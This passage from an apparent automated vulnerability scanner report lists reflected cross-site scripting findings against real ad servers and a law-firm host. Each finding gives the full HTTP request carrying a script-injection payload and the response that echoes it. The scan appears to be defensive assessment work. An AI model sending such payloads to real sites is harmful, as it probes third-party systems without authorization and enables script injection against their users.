This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e62"><script>alert(1)</script>08c4388e43e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e');" title="Email Page">
...[SNIP]...

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25012"><script>alert(1)</script>0614a672642 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=25012"><script>alert(1)</script>0614a672642 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423009; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=25012"><script>alert(1)</script>0614a672642http://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191ab'%3balert(1)//d0c8695572d was submitted in the @CPSC@ parameter. This input was echoed as 191ab';alert(1)//d0c8695572d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=191ab'%3balert(1)//d0c8695572d HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423011; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4559
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
e('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_multiclick=clickTAG1&click=191ab';alert(1)//d0c8695572dhttp://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
...[SNIP]...

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b203b'-alert(1)-'669cb54d170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&b203b'-alert(1)-'669cb54d170=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423027; expires=Sat, 11 May 2013 23:37:21 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:21 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4308
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&ml_multiclick=clickTAG1&click=&b203b'-alert(1)-'669cb54d170=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
clickTAGs += '&swfPATH=' + escape('http://ad.amtk-media.com/xl/PROD/17298
...[SNIP]...

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 986e2"><script>alert(1)</script>7e56d92a0c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&986e2"><script>alert(1)</script>7e56d92a0c0=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:20 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423020; expires=Sat, 11 May 2013 23:37:20 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:20 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4355
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&click=&986e2"><script>alert(1)</script>7e56d92a0c0=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.8. http://ad.amtk-media.com/iframe [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf39"><script>alert(1)</script>7af5e74697d was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blankaaf39"><script>alert(1)</script>7af5e74697d&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:18 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422991; expires=Sat, 11 May 2013 23:37:18 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:18 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blankaaf39"><script>alert(1)</script>7af5e74697d" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=http://www.amtrak.c
...[SNIP]...

4.9. http://ad.amtk-media.com/iframe [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971a3'%3balert(1)//62435de2831 was submitted in the target parameter. This input was echoed as 971a3';alert(1)//62435de2831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank971a3'%3balert(1)//62435de2831&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422997; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4557
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
s/amt_acl_plug_f_728x90_arn.dir/amt_acl_plug_f_728x90_arn.swf';
var flash_name= '"' + swf_name + '"';
var swfVer= 90/10;
var swfMime= 'application/x-shockwave-flash';
var clickTAGs= 'clickTARGET=_blank971a3';alert(1)//62435de2831' + '&clickTAG=' + escape('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_mul
...[SNIP]...

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df75a"-alert(1)-"b55e37a950c was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce0c'-alert(1)-'8511ba05b59 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6341e"-alert(1)-"0ee272f6ed was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var w
...[SNIP]...

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b0f4'-alert(1)-'e7171bb264d was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
